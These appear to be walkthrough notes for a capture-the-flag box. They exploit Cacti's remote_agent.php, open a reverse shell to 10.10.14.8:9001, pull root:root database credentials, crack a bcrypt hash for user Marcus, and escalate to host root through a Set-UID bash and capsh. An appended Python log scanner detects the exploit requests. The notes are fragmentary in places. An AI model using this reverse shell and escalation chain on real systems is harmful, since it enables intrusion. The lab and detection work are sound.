Jul 24, 2024
Cacti Exploit
remote_agent.php with specific GET parameters (action=polldata, X-Forwarded-For=127.0.0.1, poller_id, host_id, local_data_id)

Executing Payload
bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1'
encoded and sent via Burp Suite

Database Configuration
include/config.php — Username: root, Password: root
DB hostname specified in configuration
user_auth table)

Cracking Hashes
user_auth) and cracked using hashcat with correct mode (tested multiple modes, bcrypt identified)
FunkyMonkey for user Marcus
EMAIL Vulnerability Information: In an email on the system, pointers to kernel, Cacti, and Docker vulnerabilities
5.4.0-1047 not vulnerable)

Privilege Escalation
capsh binary to elevate privileges within the container
bash to temp, make bash Set-UID owned by root, escalate using capsh --uid=0 --gid=0 --

Achieving Root on Host
bash with -p flag to inherit privileges, gaining root on host system
root.txt
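
A defender-side check for the request pattern noted under Cacti Exploit, as an added example that is not part of the original write-up: it scans access-log lines for remote_agent.php polldata requests that carry a loopback X-Forwarded-For from a non-loopback client or a non-numeric ID parameter. The log layout (X-Forwarded-For logged as the final quoted field), the sample lines, and the expectation that the three ID parameters are plain integers are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (not from the write-up). Assumed layout: common log
# fields followed by the request's X-Forwarded-For value as a final quoted field.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Jul/2024:10:00:01 +0000] "GET /remote_agent.php?action=polldata'
    '&poller_id=1&host_id=1&local_data_id=6 HTTP/1.1" 200 54 "-"',
    '203.0.113.7 - - [24/Jul/2024:10:02:13 +0000] "GET /remote_agent.php?action=polldata'
    '&poller_id=1%20AAAA&host_id=1&local_data_id=6 HTTP/1.1" 200 54 "127.0.0.1"',
    '203.0.113.7 - - [24/Jul/2024:10:02:40 +0000] "GET /index.php HTTP/1.1" 200 5120 "-"',
    '203.0.113.9 - - [24/Jul/2024:10:03:02 +0000] "GET /remote_agent.php?action=polldata'
    '&poller_id=1&host_id=1&local_data_id=6 HTTP/1.1" 200 54 "127.0.0.1"',
]

LINE_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?:GET|POST) (?P<url>\S+) [^"]*" \d+ \S+ "(?P<xff>[^"]*)"$')
ID_PARAMS = ("poller_id", "host_id", "local_data_id")  # names as listed on the page
LOOPBACK = {"127.0.0.1", "::1", "localhost"}

def inspect(line):
    """Return the findings for one log line; an empty list means nothing flagged."""
    m = LINE_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["url"])
    qs = parse_qs(url.query, keep_blank_values=True)  # values are percent-decoded
    if not url.path.endswith("/remote_agent.php") or "polldata" not in qs.get("action", []):
        return []
    findings = []
    # A remote peer claiming to be loopback is trying to pass as a trusted source.
    if m["xff"].split(",")[0].strip() in LOOPBACK and m["src"] not in LOOPBACK:
        findings.append("loopback X-Forwarded-For from non-loopback client")
    for name in ID_PARAMS:
        for value in qs.get(name, []):
            if not re.fullmatch(r"[0-9]+", value):
                findings.append(f"non-numeric {name}: {value!r}")
    return findings

def scan(lines):
    """Return (line_index, findings) for every flagged line."""
    return [(i, f) for i, line in enumerate(lines) if (f := inspect(line))]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_LOG):
        print(idx, findings)
```
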